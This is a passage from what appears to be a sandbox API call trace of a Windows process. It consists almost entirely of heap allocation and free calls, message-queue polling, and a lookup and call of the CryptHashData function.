hHeap=0x970000) returned 1 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0201.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0201.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0201.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0201.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ef8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0201.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0201.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0201.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0201.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0201.172] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0201.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0201.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0201.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0201.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ab8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.241] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0201.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.241] CryptHashData (hHash=0xa87410, pbData=0x2e54da8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0201.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0201.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0201.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0201.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0201.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0201.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0201.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0201.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0201.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0201.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0201.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0201.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 